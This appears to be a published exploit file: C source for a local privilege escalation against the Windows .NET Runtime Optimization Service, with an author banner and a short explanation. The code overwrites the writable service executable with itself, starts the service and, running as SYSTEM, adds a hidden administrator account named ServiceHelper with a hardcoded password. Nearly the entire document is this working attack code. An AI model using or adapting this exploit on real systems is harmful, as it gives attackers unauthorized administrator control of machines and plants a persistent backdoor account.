.NET runtime optimization service privilege escalation exploit that leverages the fact that the service's EXE file can be overwritten by any non-admin domain user and local power users. This exploit compiles to a service that uses the original service's id.
744f7672e14b5f0fc0764ea74c1519e7a0ebfe6e8883fc42b8bab17499280a19
/*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta <xenomuta@tuxfamily.org>
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a
_ __ __ ___ __
| |/ /__ ____ ____ / |/ /_ __/ /_____ _
| / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
/ / __/ / / / /_/ / / / / /_/ / /_/ /_/ /
/_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/
xenomuta [at] tuxfamily.org
xenomuta [at] gmail.com
https://xenomuta.tuxfamily.org/ - Methylxantina 256mg
This one's a no-brainer, plain simple:
This service's EXE file can be overwritten by any non-admin domain user
and local power users ( wich are the default permissions set ).
This exploit compiles to a service that uses the original service's id.
Tested on Windows 2003, WinXP (sp3) and Win7
( my guess is that it runs on any win box running this service ).
greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!!
bless y'all!
*/
#include <stdio.h>
#include <windows.h>
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;
#define PWN_EXE "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
#define PWN_SHORT "mscorsvw.exe"
#define PWN_NAME ".NET Runtime Optimization Service v2.0.50727_X86"
#define PWN_ID "clr_optimization_v2.0.50727_32"
void ServiceMain(int argc, char** argv) {
if (InitService()) {
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = -1;
SetServiceStatus(hStatus, &ServiceStatus);
return;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (hStatus, &ServiceStatus);
}
void ControlHandler(DWORD request);
int InitService();
int main(int argc, char **argv) {
char acUserName[100];
DWORD nUserName = sizeof(acUserName);
GetUserName(acUserName, &nUserName);
if (strcmp((char *)&acUserName, "SYSTEM")) {
char *str = (char *)malloc(2048);
memset(str, 0, 2048);
snprintf(str, 2048, "%s.bak", PWN_EXE);
if (rename(PWN_EXE, str) != 0) {
fprintf(stderr, " :( sorry, can't write to file.\n");
exit(1);
}
CopyFile(argv[0], PWN_EXE, !0);
snprintf(str, 2048, "net start \"%s\" 2> NUL > NUL",PWN_NAME);
printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
system(str);
}
SERVICE_TABLE_ENTRY ServiceTable[2];
ServiceTable[0].lpServiceName = PWN_ID;
ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
ServiceTable[1].lpServiceName = NULL;
ServiceTable[1].lpServiceProc = NULL;
StartServiceCtrlDispatcher(ServiceTable);
return 0;
}
int InitService() {
system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
}